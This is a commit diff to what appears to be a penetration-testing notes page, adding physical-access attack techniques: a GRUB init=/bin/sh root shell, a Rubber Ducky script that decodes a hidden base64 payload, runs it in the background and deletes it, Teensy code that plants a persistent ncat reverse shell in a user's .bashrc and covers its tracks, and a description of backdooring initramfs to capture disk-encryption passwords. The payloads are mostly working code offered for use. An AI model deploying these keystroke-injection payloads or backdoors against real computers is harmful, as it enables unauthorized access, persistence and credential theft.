Rubber Ducky + Teensy + Initramfs info

pull/1/head
Swissky 2017-11-12 14:30:59 +01:00
parent 4071589beb
commit 8fb4584073
1 changed files with 74 additions and 2 deletions

View File

@ -38,7 +38,7 @@ Most of the times you can acces the debug application on the port 80 on the inte
## USB Live ISO ## USB Live ISO
When there is no bios password, it's easy to compromise the computer by booting with a Live USB / Live CD and adding the backdoor. When there is no bios password, it's easy to compromise the computer by booting with a Live USB / Live CD and adding the backdoor.
## Grub - root access ## Grub - Root access
Even if there is a bios password you still need to secure your Grub (boot-manager), otherwise anyone can edit it in order to start a root shell. Even if there is a bios password you still need to secure your Grub (boot-manager), otherwise anyone can edit it in order to start a root shell.
{% highlight bash%} {% highlight bash%}
@ -47,8 +47,80 @@ Press [E] to edit the command line
Append init=/bin/sh Append init=/bin/sh
{% endhighlight %} {% endhighlight %}
## USB : Rubber Ducky or Teensy
If you are willing to spend around 40$, you can buy a Rubber Ducky. This is a fake USB which will act as a keyboard and send any key to the plugged computer. The payload can be created within a notepad or online at https://ducktoolkit.com/.
The full documentation is available at [https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript)
The following script was generated by DuckToolkit and serve a directory via HTTP
{% highlight bash%}
DEFAULT_DELAY 100
DELAY 3000
CTRL-ALT t
DELAY 200
STRING printf '\e[3;1;1t'
ENTER
STRING echo H4sIACBLCFoC/13OzwqDMAwG8HufIiDM9jAfYLD7joLei2hmC/1HGgXffh2dHpbTx0f4JdanSAwxC1tTPq7oN8c2UZwxZxtWIRZ8Qzq0YU5SPQSUibmbzWJJtq06i0Iwetmmg00McPcwFNHhaxz7AWlHAriVddEUUBskrDRtQU/OnfTf+a6vUfJEK/Lz94jqcilY1uvN16jipX0AB59ZiuMAAAA= | base64 --decode | gzip -d > environ-34314.py
ENTER
STRING nohup python environ-34314.py > /dev/null 2>&1 &
ENTER
STRING rm -rf environ-34314.py
ENTER
STRING exit
ENTER
{% endhighlight %}
Alternatively you can buy a Teensy board for 15$, it requires a little bit of configuration but it works as well
First, you need to install the arduino IDE, the Teensyduino and the rules for the Teensy board.
{% highlight bash%}
wget https://raw.githubusercontent.com/apmorton/teensy-template/master/tools/49-teensy.rules
mv 49-teensy.rules /etc/udev/rules.d/49-teensy.rules
wget https://www.pjrc.com/teensy/td_140/TeensyduinoInstall.linux64 && chmod +x ./TeensyduinoInstall.linux64 &&./TeensyduinoInstall.linux64
wget https://www.arduino.cc/download_handler.php
tar xvf arduino-1.8.5-linux64.tar.xz
{% endhighlight %}
The following code press the keys [ALT]+[F2], then write "xterm", followed by an echo into the user's .bashrc
{% highlight c%}
void setup() {
delay(100);
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_F2);
Keyboard.send_now();
delay(100);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(100);
Keyboard.println("xterm");
delay(100);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(100);
// Reverse-shell stored in the bashrc
Keyboard.println(" echo ' ncat 192.168.1.XX 4242 -e /bin/bash 2>/dev/null & clear' >> $HOME/.bashrc ");
delay(100);
// Now we clean our tracks
Keyboard.println("exit");
delay(100);
}
void loop() {
delay(5000);
}
{% endhighlight %}
NOTE: When programming the board press the "RESET" button to avoid the launch of the payload on your computer
## Initramfs Backdoor - Encrypted Hard Drive
When you're booting there is one partition that is not encrypted in order to start. It will ask for your password and then decrypt and mount the other partition. If you have and access to the hard drive it is possible to replace the Initramfs.img in order to get the password to decrypt the full hdd, you can also wait for the decryption and then inject what you want inside a file as root :)
## Encrypted Hard Drive
Mounting boot partition (not encrypted) Mounting boot partition (not encrypted)
{% highlight bash%} {% highlight bash%}
fdisk -l /dev/sda fdisk -l /dev/sda